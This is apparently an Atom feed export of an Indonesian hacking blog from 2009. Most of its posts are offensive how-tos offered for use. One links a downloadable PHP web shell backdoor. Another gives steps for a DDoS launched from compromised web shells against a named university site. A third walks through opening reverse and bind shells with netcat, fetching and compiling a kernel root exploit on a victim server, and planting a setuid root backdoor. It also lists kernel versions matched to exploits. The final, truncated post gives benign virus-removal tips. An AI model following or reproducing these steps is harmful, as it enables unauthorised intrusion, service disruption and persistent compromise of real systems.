<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-147779869695781423</id><updated>2012-02-16T08:34:00.140-08:00</updated><title type='text'>SeCuRiTy RiSk</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>8</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-147779869695781423.post-3848638179529391741</id><published>2009-10-12T01:08:00.000-07:00</published><updated>2009-10-19T01:30:55.200-07:00</updated><title type='text'>simple php shell (backdoor)</title><content type='html'>enjoy,,&lt;br /&gt;just 14 kb..&lt;br /&gt;&lt;a href="http://www.chirca.info/incontri/c99.zip"&gt;&lt;/a&gt;&lt;a href="http://www.4shared.com/file/138651994/185b200/b374k_m1n1.html"&gt;download disini&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/147779869695781423-3848638179529391741?l=achyx322.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/3848638179529391741/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://achyx322.blogspot.com/2009/10/c99-shell-backdoor.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/3848638179529391741'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/3848638179529391741'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/2009/10/c99-shell-backdoor.html' title='simple php shell (backdoor)'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-147779869695781423.post-7785045534125018255</id><published>2009-06-02T05:32:00.000-07:00</published><updated>2009-06-02T05:52:06.946-07:00</updated><title type='text'>Remote Dos Exploit khusus</title><content type='html'>&lt;span class="corners-top"&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;h3 class="first"&gt;&lt;a href="http://www.jasakom.com/forum/viewtopic.php?f=112&amp;amp;t=9663#p77521"&gt;Remote Dos Exploit khusus&lt;/a&gt;&lt;/h3&gt;    &lt;p class="author"&gt;by &lt;strong&gt;&lt;a href="http://www.jasakom.com/forum/memberlist.php?mode=viewprofile&amp;amp;u=28067" style="color: rgb(0, 51, 0);" class="username-coloured"&gt;Syn0madeous&lt;/a&gt;&lt;/strong&gt; on 29 May 2009, 03:22&lt;br /&gt;&lt;/p&gt;&lt;p class="author"&gt;&lt;br /&gt;&lt;/p&gt;         Teknik Remote Dos Exploit Khusus&lt;br /&gt;&lt;br /&gt;yup kali ini ane share sedikit exploit racikan ane khusus utk remote dos exploit&lt;br /&gt;. sebagai sample khusus utk uji coba targetnya adl &lt;!-- w --&gt;&lt;a class="postlink" href="http://www.bsi.ac.id/"&gt;http://www.bsi.ac.id/&lt;/a&gt;&lt;!-- w --&gt; (remote dos exploit ini udah khusus dirancang utk server uji coba)&lt;br /&gt;&lt;br /&gt;ok pertama 2 yg diperlukan adl minimal 15-20 php shell backdoor dg safe mode off dan socket bisa jalan.&lt;br /&gt;download dulu remote dos exploitnya di sini:&lt;br /&gt;&lt;!-- m --&gt;&lt;a class="postlink" href="http://www.slbbalikpapan.net/images/dos_exploit.rar"&gt;http://www.slbbalikpapan.net/images/dos_exploit.rar&lt;/a&gt;   (khusus bwt bsi.ac.id   , jika ingin mengganti target silahkan edit file .sh   , nama web diganti nama web,port diganti dgn port)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ok kalo udah didownload langsung aja upload dos_exploit.rar ke php shell backdoor kita, setelah itu jalankan perintah shell:&lt;br /&gt;agar semua php shell tadi bisa dikontrol oleh anda, ekstrak dos_exploit.rar tadi di komputer anda,&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;ketik: unrar e dos_exploit.rar&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;setelah itu semuanya akan terekstrak ke direktori dos_exploit&lt;br /&gt;&lt;br /&gt;misal alamat shell bd anda: &lt;!-- m --&gt;&lt;a class="postlink" href="http://zombie.com/shell_anda.php"&gt;http://zombie.com/shell_anda.php&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;setelah diekstrak maka akan tercipta dir dos_exploit dg php shell kecil utk menjalankan remote dos exploit:&lt;br /&gt;&lt;br /&gt;jadi misal:&lt;br /&gt;&lt;br /&gt;&lt;!-- m --&gt;&lt;a class="postlink" href="http://zombie.com/dos_exploit/sh.php?cmd="&gt;http://zombie.com/dos_exploit/sh.php?cmd=&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;di mana semua remote dos exploit ada di dir dos_exploit&lt;br /&gt;&lt;br /&gt;lalu save semua list 2 zombie 2 yang udah siap tersebut di file dg nama z.txt di komputer anda&lt;br /&gt;&lt;br /&gt;misal isi file z.txt:&lt;br /&gt;&lt;br /&gt;&lt;!-- m --&gt;&lt;a class="postlink" href="http://zombie.com/dos_exploit/sh.php?cmd="&gt;http://zombie.com/dos_exploit/sh.php?cmd=&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;!-- m --&gt;&lt;a class="postlink" href="http://zombie1.com/dos_exploit/sh.php?cmd="&gt;http://zombie1.com/dos_exploit/sh.php?cmd=&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;!-- m --&gt;&lt;a class="postlink" href="http://zombie2.com/lokasi_shell/dos_exploit/sh.php?cmd="&gt;http://zombie2.com/lokasi_shell/dos_exploit/sh.php?cmd=&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;ddst...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;buat list minimal anda perlu 15 (lebih banyak lebih bagus)&lt;br /&gt;&lt;br /&gt;ok setelah semua remote dos exploit terpasang, anda run di komputer lokal anda exploit 2 nya(harus ada perl interpreter),&lt;br /&gt;&lt;br /&gt;ketikkan perintah2 ini dari ms dos atau shell di direktori dos_exploit di komputer anda:&lt;br /&gt;&lt;br /&gt;perl rm.pl&lt;br /&gt;perl z0.pl&lt;br /&gt;perl z1.pl&lt;br /&gt;perl z2.pl&lt;br /&gt;perl z3.pl&lt;br /&gt;perl z4.pl&lt;br /&gt;perl z5.pl&lt;br /&gt;&lt;br /&gt;keterangan&lt;br /&gt;&lt;br /&gt;semuanya adl remote dos controller utk tiap shell yg telah anda pasang.&lt;br /&gt;&lt;br /&gt;di mana z0.pl di komputer lokal berguna menjalankan exploit z0.sh di tiap zombie anda,&lt;br /&gt;di mana z1.pl di komputer lokal berguna menjalankan exploit z1.sh di tiap zombie anda,&lt;br /&gt;di mana z2.pl di komputer lokal berguna menjalankan exploit z2.sh di tiap zombie anda,&lt;br /&gt;di mana z3.pl di komputer lokal berguna menjalankan exploit z3.sh di tiap zombie anda,&lt;br /&gt;di mana z4.pl di komputer lokal berguna menjalankan exploit z4.sh di tiap zombie anda,&lt;br /&gt;di mana z5.pl di komputer lokal berguna menjalankan exploit z5.sh di tiap zombie anda,&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ok setelah semua anda run silahkan tunggu beberapa menit maka server target uji coba kita di &lt;!-- w --&gt;&lt;a class="postlink" href="http://www.bsi.ac.id/"&gt;http://www.bsi.ac.id/&lt;/a&gt;&lt;!-- w --&gt; akaan seperti ini jika anda berhasil:&lt;br /&gt;&lt;br /&gt;selamat mencoba,,&lt;br /&gt;&lt;br /&gt;Artikel ini dari &lt;a href="http://www.jasakom.com/forum/viewtopic.php?f=112&amp;amp;t=9663" style="color: rgb(0, 51, 0);" class="username-coloured"&gt;Syn0madeous&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/147779869695781423-7785045534125018255?l=achyx322.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/7785045534125018255/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://achyx322.blogspot.com/2009/06/remote-dos-exploit-khusus.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/7785045534125018255'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/7785045534125018255'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/2009/06/remote-dos-exploit-khusus.html' title='Remote Dos Exploit khusus'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-147779869695781423.post-9210813513476666247</id><published>2009-05-21T15:03:00.000-07:00</published><updated>2009-05-21T16:00:28.994-07:00</updated><title type='text'>Get Root</title><content type='html'>(netcat hrus dah diinstall yah)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;buka php-shellnya&lt;br /&gt;liat yg dibagian atas ada server-ip dan your-ip&lt;br /&gt;yg server ip itu ip-addressnya si target,, dan your ip itu ip address kita&lt;br /&gt;klik di menu netsploit&lt;br /&gt;ada dua cara koneksi (bind dan back-connect)&lt;br /&gt;klo bind-connect&lt;br /&gt;di server buka port dan nunggu koneksi dari kita&lt;br /&gt;klo back-connect&lt;br /&gt;kita buka port dan nunggu koneksi dari server...&lt;br /&gt;&lt;br /&gt;----lanjutt&lt;br /&gt;cobain yg bind-connect dulu aja&lt;br /&gt;ada dua script.. satu pake perl satu lagi pake bahasa c, klo gcc di disable, pake yg perl, dan sebaliknya&lt;br /&gt;oh ya,,, cari folder yg ada write permission -nya,,, klo gak nemu pindah ke /tmp/ aja&lt;br /&gt;masukkin nomer port yg mau dibuka untuk listening trus pilih password , klik di tombol 'bind'&lt;br /&gt;abis itu tunggu sbentar,,,&lt;br /&gt;dari komputer kmu buka terminal/ms-dos prompt&lt;br /&gt;trus konek pake netcat ke server&lt;br /&gt;misalnya server ip nya 212.212.212.212 dan portnya 13123&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;$ nc 212.212.212.212 13123&lt;br /&gt;bash: no job control in this shell&lt;br /&gt;[ 17:37 ] nobody:/tmp$ ls&lt;br /&gt;bdp&lt;br /&gt;flashgot.z8t0a58f.default&lt;br /&gt;gedit.ketek90.2662082588&lt;br /&gt;keyring-GTMRnt&lt;br /&gt;libgksu-7t347l&lt;br /&gt;orbit-ketek90&lt;br /&gt;orbit-root&lt;br /&gt;pulse-ketek90&lt;br /&gt;seahorse-0qlTmU&lt;br /&gt;ssh-RnMftS5976&lt;br /&gt;Tracker-ketek90.6236&lt;br /&gt;virtual-ketek90.lCZNc9&lt;br /&gt;[ 17:37 ] nobody:/tmp$ id&lt;br /&gt;uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;klo untuk yg back-connect dan pake router.. kmu harus set dulu port-forwarding ko ip-address kmu di jaringan,,,&lt;br /&gt;misalnya ip-address kmu yg di php-shell 212.200.200.200,, nah ini namanya ip-public&lt;br /&gt;yg namanya ip-private , ip lokal di jaringan bisa kmu lihat pake ifconfig atau ipconfig biasanya kyk gini 192.168.x.x atau 10.x.x.x atau 172.16-31.x.x&lt;br /&gt;misalnya kmu mau pake port 13123, y udah di forward aja ke port 13123&lt;br /&gt;bis itu di terminal/ms-dos prompt&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;keterangan:&lt;br /&gt;-l  --&gt; listening (nunggu koneksi)&lt;br /&gt;-p --&gt; nomer port , kita kan pake port 13123&lt;br /&gt;$ nc -l -p 13123 &lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;trus abis itu kmu ke shell php yg bagian netsploit,, yg di back-connect,, ada dua script juga, perl dan bahsa c,, cobain aja dua2nya, isi ip-nya dengan server-ip,,biasanya udah keisi secara default&lt;br /&gt;bis itu langsung klik connect,&lt;br /&gt;ntar di terminal muncul kyk gini...&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;Linux 6292 2.6.24.11-generic #1 SMP Thu Jan 29 19:24:39 UTC 2009 i686 GNU/Linux&lt;br /&gt;uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)&lt;br /&gt;$ ls&lt;br /&gt;bcp&lt;br /&gt;bdp&lt;br /&gt;flashgot.z8t0a58f.default&lt;br /&gt;gedit.ketek90.2662082588&lt;br /&gt;keyring-GTMRnt&lt;br /&gt;libgksu-7t347l&lt;br /&gt;orbit-ketek90&lt;br /&gt;orbit-root&lt;br /&gt;pulse-ketek90&lt;br /&gt;seahorse-0qlTmU&lt;br /&gt;ssh-RnMftS5976&lt;br /&gt;Tracker-ketek90.6236&lt;br /&gt;virtual-ketek90.lCZNc9&lt;br /&gt;$ id&lt;br /&gt;uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;nah klo udah connect,,,(mau pake bind ato back,,,)&lt;br /&gt;kita coba nge-root&lt;br /&gt;coba liat versi kernelnya dengan uname -a&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;$ uname -a&lt;br /&gt;Linux 6292 2.6.24.11-generic #1 SMP Thu Jan 29 19:24:39 UTC 2009 i686 GNU/Linux&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;langsung ke milw0rm, search 2.6.24&lt;br /&gt;mm nyam nyam,, ada dua local root exploit... yg dianelane sama jessica,,&lt;br /&gt;sblum di upload ke server,, ada baiknya baca dulu tuh source-code exploitnya,,,&lt;br /&gt;misalnya kita mo pake yg jessica&lt;br /&gt;di source dibilang suruh compile dgn option  -static -Wno-format&lt;br /&gt;langsung aja dari netcat yg udah konek tadi kita download exploitnya (bisa juga diupload lewat php-shell)&lt;br /&gt;misalnya kita skarang di directory /tmp/&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;$ wget http://www.milw0rm.com/exploits/download/5092&lt;br /&gt;--2009-03-29 17:55:30--  http://www.milw0rm.com/exploits/download/5092&lt;br /&gt;Resolving www.milw0rm.com... 76.74.9.18&lt;br /&gt;Connecting to www.milw0rm.com|76.74.9.18|:80... connected.&lt;br /&gt;HTTP request sent, awaiting response... 200 OK&lt;br /&gt;Length: unspecified [text/plain]&lt;br /&gt;Saving to: `5092'&lt;br /&gt;&lt;br /&gt;[ &lt;=&gt;                                   ] 6,292       --.-K/s   in 0.1s&lt;br /&gt;&lt;br /&gt;2009-03-29 17:55:31 (41.5 KB/s) - `5092' saved [6292]&lt;br /&gt;$ ls&lt;br /&gt;5092&lt;br /&gt;bcp&lt;br /&gt;bdp&lt;br /&gt;flashgot.z8t0a58f.default&lt;br /&gt;gedit.ketek90.2662082588&lt;br /&gt;keyring-GTMRnt&lt;br /&gt;libgksu-7t347l&lt;br /&gt;orbit-ketek90&lt;br /&gt;orbit-root&lt;br /&gt;pulse-ketek90&lt;br /&gt;seahorse-0qlTmU&lt;br /&gt;ssh-RnMftS5976&lt;br /&gt;Tracker-ketek90.6236&lt;br /&gt;virtual-ketek90.lCZNc9&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;jiyah ,tuh namanya 5092,,&lt;br /&gt;rubah jadi .c trus compile pake gcc dgn option -static -Wno-format&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;$ mv 5092 5092.c&lt;br /&gt;$ gcc 5092.c -static -Wno-format&lt;br /&gt;$ ls&lt;br /&gt;5092.c&lt;br /&gt;a.out&lt;br /&gt;bcp&lt;br /&gt;bdp&lt;br /&gt;flashgot.z8t0a58f.default&lt;br /&gt;gedit.ketek90.2662082588&lt;br /&gt;keyring-GTMRnt&lt;br /&gt;libgksu-7t347l&lt;br /&gt;orbit-ketek90&lt;br /&gt;orbit-root&lt;br /&gt;pulse-ketek90&lt;br /&gt;seahorse-0qlTmU&lt;br /&gt;ssh-RnMftS5976&lt;br /&gt;Tracker-ketek90.6236&lt;br /&gt;virtual-ketek90.lCZNc9&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;ada file bru namanya a.out itu hasil compile dari gcc&lt;br /&gt;klo mo dicompile dgn nama lain tambahin option -o&lt;br /&gt;gcc 5092.c -static -Wno-format -o myexploit&lt;br /&gt;klo ini ntar nongol file bru myexploit&lt;br /&gt;abis compile jgn lupa rubah permissionnya supaya bisa diexecute&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;$ chmod +x a.out&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;bis itu langsung jalanin aja exploitnya&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;$ ./a.out&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;klo server vuln ntar langsung dapet root&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;code&gt;$ id&lt;br /&gt;uid=0(root) gid=0(root) groups=0(root)&lt;/code&gt;&lt;/blockquote&gt;&lt;code&gt;&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;klo gagal,,pke exploit yg lain,,, atu gak liat servis yg jalan di server,,,cari exploitnya,,&lt;br /&gt;ingat bnyak jalan menuju ciledug  &lt;img src="http://www.jasakom.com/forum/images/smilies/rofl2.gif" alt="" /&gt;&lt;br /&gt;&lt;br /&gt;klo dah dapet root.. terserah dueh mau ngapain... hauwuwhauwhauaw...&lt;br /&gt;klo aku biasanya&lt;a href="http://i734.photobucket.com/albums/ww346/achyx/untitled-1.jpg"&gt; gini&lt;/a&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;---&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;compile file ini..&lt;br /&gt;misalnya ntar nama filenya yg udah dicompile b374k&lt;br /&gt;bis itu ganti owner jadi root&lt;br /&gt;$ chown root:root b374k&lt;br /&gt;nah skaarng tuh file b374k owner nya root, bis itu rubah modenya supaya merubah user-level kita jadi berubah sesuai owner nya si file (tadi kan udah kita rubah owner nya jadi root), jadi walaupun kita bukan root,, trus kita jalanin file ini,, kita langsung brubah jadi root... wowwwww&lt;br /&gt;$ chmod +s b374k&lt;br /&gt;pindahin ke /usr/bin ato kmana gitu supaya besok2 klo datang keserver ini lagi bisa langsung dapat root..&lt;br /&gt;&lt;br /&gt;misalnya kita connect lagi ke server... trus mau dapat root..&lt;br /&gt;g usah lagi pake exploit nya..&lt;br /&gt;langsung aja run dngan memanggil namanya (filenya yg tadi di /usr/bin misalnya namanya b374k)&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;$ b374k&lt;br /&gt;bash-3.2# id&lt;br /&gt;uid=0(root) gid=1000(ketek90) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(ketek90)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;yihaaaaaa...&lt;br /&gt;&lt;img src="http://www.jasakom.com/forum/images/smilies/rofl2.gif" alt="" /&gt;&lt;br /&gt;&lt;br /&gt;ni ada kumpulan list2 kernel dengan exploit nya,,cari aja di google/milworm exploitnya&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;/code&gt;&lt;blockquote&gt;2.4.17&lt;br /&gt;newlocal&lt;br /&gt;kmod&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.18&lt;br /&gt;brk&lt;br /&gt;brk2&lt;br /&gt;newlocal&lt;br /&gt;kmod&lt;br /&gt;km.2&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.19&lt;br /&gt;brk&lt;br /&gt;brk2&lt;br /&gt;newlocal&lt;br /&gt;kmod&lt;br /&gt;km.2&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.20&lt;br /&gt;ptrace&lt;br /&gt;kmod&lt;br /&gt;ptrace-kmod&lt;br /&gt;km.2&lt;br /&gt;brk&lt;br /&gt;brk2&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.21&lt;br /&gt;km.2&lt;br /&gt;brk&lt;br /&gt;brk2&lt;br /&gt;ptrace&lt;br /&gt;ptrace-kmod&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.22&lt;br /&gt;km.2&lt;br /&gt;brk2&lt;br /&gt;brk&lt;br /&gt;ptrace&lt;br /&gt;ptrace-kmod&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.22-10&lt;br /&gt;loginx&lt;br /&gt;./loginx&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.23&lt;br /&gt;mremap_pte&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.24&lt;br /&gt;mremap_pte&lt;br /&gt;Uselib24&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.25-1&lt;br /&gt;uselib24&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.4.27&lt;br /&gt;Uselib24&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.0&lt;br /&gt;REDHAT 6.2&lt;br /&gt;REDHAT 6.2 (zoot)&lt;br /&gt;SUSE 6.3&lt;br /&gt;SUSE 6.4&lt;br /&gt;REDHAT 6.2 (zoot)&lt;br /&gt;all top from rpm&lt;br /&gt;-------------------------&lt;br /&gt;FreeBSD 3.4-STABLE from port&lt;br /&gt;FreeBSD 3.4-STABLE from packages&lt;br /&gt;freeBSD 3.4-RELEASE from port&lt;br /&gt;freeBSD 4.0-RELEASE from packages&lt;br /&gt;----------------------------&lt;br /&gt;all with wuftpd 2.6.0;&lt;br /&gt;=&lt;br /&gt;wuftpd&lt;br /&gt;h00lyshit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.2&lt;br /&gt;mremap_pte&lt;br /&gt;krad&lt;br /&gt;h00lyshit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.5 to 2.6.10&lt;br /&gt;krad&lt;br /&gt;krad2&lt;br /&gt;h00lyshit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.8-5&lt;br /&gt;krad2&lt;br /&gt;./krad x&lt;br /&gt;x = 1..9&lt;br /&gt;h00lyshit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.9-34&lt;br /&gt;r00t&lt;br /&gt;h00lyshit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2.6.13-17&lt;br /&gt;prctl&lt;br /&gt;h00lyshit&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;&lt;br /&gt;2.4.17 -&gt; newlocal, kmod, uselib24&lt;br /&gt;2.4.18 -&gt; brk, brk2, newlocal, kmod&lt;br /&gt;2.4.19 -&gt; brk, brk2, newlocal, kmod&lt;br /&gt;2.4.20 -&gt; ptrace, kmod, ptrace-kmod, brk, brk2&lt;br /&gt;2.4.21 -&gt; brk, brk2, ptrace, ptrace-kmod&lt;br /&gt;2.4.22 -&gt; brk, brk2, ptrace, ptrace-kmod&lt;br /&gt;2.4.22-10 -&gt; loginx&lt;br /&gt;2.4.23 -&gt; mremap_pte&lt;br /&gt;2.4.24 -&gt; mremap_pte, uselib24&lt;br /&gt;2.4.25-1 -&gt; uselib24&lt;br /&gt;2.4.27 -&gt; uselib24&lt;br /&gt;2.6.2 -&gt; mremap_pte, krad, h00lyshit&lt;br /&gt;2.6.5 -&gt; krad, krad2, h00lyshit&lt;br /&gt;2.6.6 -&gt; krad, krad2, h00lyshit&lt;br /&gt;2.6.7 -&gt; krad, krad2, h00lyshit&lt;br /&gt;2.6.8 -&gt; krad, krad2, h00lyshit&lt;br /&gt;2.6.8-5 -&gt; krad2, h00lyshit&lt;br /&gt;2.6.9 -&gt; krad, krad2, h00lyshit&lt;br /&gt;2.6.9-34 -&gt; r00t, h00lyshit&lt;br /&gt;2.6.10 -&gt; krad, krad2, h00lyshit&lt;br /&gt;2.6.13 -&gt; raptor, raptor2, h0llyshit, prctl&lt;br /&gt;2.6.14 -&gt; raptor, raptor2, h0llyshit, prctl&lt;br /&gt;2.6.15 -&gt; raptor, raptor2, h0llyshit, prctl&lt;br /&gt;2.6.16 -&gt; raptor, raptor2, h0llyshit, prctl&lt;br /&gt;2.6.11 ve 2.6.16 Arasi -&gt; prctl, raptor, raptor2, h00lyshit&lt;br /&gt;2.6.17 ve Ustlerinde -&gt; 06 cw7.3 Jessica x x2&lt;br /&gt;2.6.23 - 2.6.24 -&gt; diane_lane_******_hard.c (http://milw0rm.com/exploits/5093)&lt;br /&gt;2.6.17 - 2.6.24-1 -&gt; jessica_biel_naked_in_my_bed.c (http://milw0rm.com/exploits/5092)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Di ambil dari jasakom.com&lt;br /&gt;Post by :ketek&lt;br /&gt;thanx to ketek,,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/147779869695781423-9210813513476666247?l=achyx322.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://achyx322.blogspot.com/feeds/9210813513476666247/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://achyx322.blogspot.com/2009/05/netcat-hrus-dah-diinstall-yah-buka-php.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/9210813513476666247'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/147779869695781423/posts/default/9210813513476666247'/><link rel='alternate' type='text/html' href='http://achyx322.blogspot.com/2009/05/netcat-hrus-dah-diinstall-yah-buka-php.html' title='Get Root'/><author><name>achyx</name><uri>http://www.blogger.com/profile/03005060646167433183</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-147779869695781423.post-3222461394454501587</id><published>2009-05-11T07:40:00.000-07:00</published><updated>2009-05-11T07:42:37.903-07:00</updated><title type='text'>Langkah-langkah menghilangkan virus komputer</title><content type='html'>&lt;p&gt;Beberapa tahun belakangan banyak bermunculan virus-virus yang mulai merepotkan masyarakat pengguna komputer. Kalau dahulu pengguna internet saja yang dipusingkan oleh virus karena penyebarannya yang masih terbatas melalui email dan jaringan. Seiring perkembangan teknologi maka perangkat mobile teknologi informasi juga berkembang. Saat ini hampir tiap pengguna komputer pasti memiliki flash disk yang merupakan media penyimpanan data yang sangat portable dan mudah digunakan karena sifatnya seperti disket namun dengan kapasitas besar dan tidak mudah rusak. Namun kepopuleran flash disk di pengguna komputer memancing para pembuat virus untuk membuat virus yang menyebar melalui media penyimpanan ini. Hal ini membuat para pengguna yang kurang paham komputer terkadang tertipu karena menjalankan virus yang disangkanya adalah file lain seperti file dokumen Microsoft Word, Folder, atau bentuk file lainnya. Padahal yang sedang dibuka adalah program virus yang memiliki icon sama dengan file-file tersebut.&lt;/p&gt; &lt;p&gt;Tidak perlu membahas terlalu panjang sejarah kemunculan virus ini, namun buat pengguna yang sudah terkena virus maka sebenarnya langkah pembasmian virus-virus tersebut hampir sama. Biasanya masyarakat umum yang tidak memiliki akses internet di komputernya akan lebih mudah terkena virus karena antivirus yang tidak up to date sehingga antivirus miliknya tidak mengenali virus-virus baru. Ada beberapa cara menghilangkan virus dari komputer anda bila sudah terlanjur terinfeksi virus ini. Teknik-teknik berikut dibahas pada sistem operasi Windows XP karena OS inilah yang paling umum terinfeksi dan paling banyak digunakan. Berikut adalah teknik teknik tersebut:&lt;span id="more-49"&gt;&lt;/span&gt;&lt;/p&gt; &lt;h4&gt;Menghapus dengan antivirus di komputer lain&lt;/h4&gt; &lt;p&gt;Dengan melepaskan hardisk komputer yang telah terinfeksi virus kemudian dipasangkan ke komputer lain yang memilki antivirus yang terbaru atau setidaknya mampu mengenali virus di sistem yang telah terinfeksi. Lakukan full scanning pada hardisk sistem yang terinfeksi dan hapus semua virus yang ditemukan. Setelah selesai hardisk tersebut sudah dapat dipasang 